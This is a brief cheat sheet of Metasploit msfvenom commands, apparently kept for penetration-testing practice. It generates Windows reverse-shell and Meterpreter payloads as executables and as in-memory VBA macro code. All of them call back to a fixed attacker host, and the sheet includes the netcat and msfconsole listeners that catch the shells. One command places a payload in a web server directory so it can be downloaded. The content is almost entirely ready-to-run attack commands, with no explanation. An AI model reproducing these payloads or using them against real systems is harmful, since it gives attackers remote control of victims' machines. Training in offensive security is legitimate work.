Msfvenom
Non-Staged windows EXE
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.120 LPORT=444 -f exe -o shell.exe
sudo nc -lnvp 444
Non-Stage meterpreter Exe
sudo msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o /var/www/html/msfnonstaged.exe
Stage meterpreter Exe
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
sudo msfconsole -q -x "use windows/x64/meterpreter/reverse_https; set LHOST 10.0.0.241; set LPORT 443; exploit"
VBA in memory
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication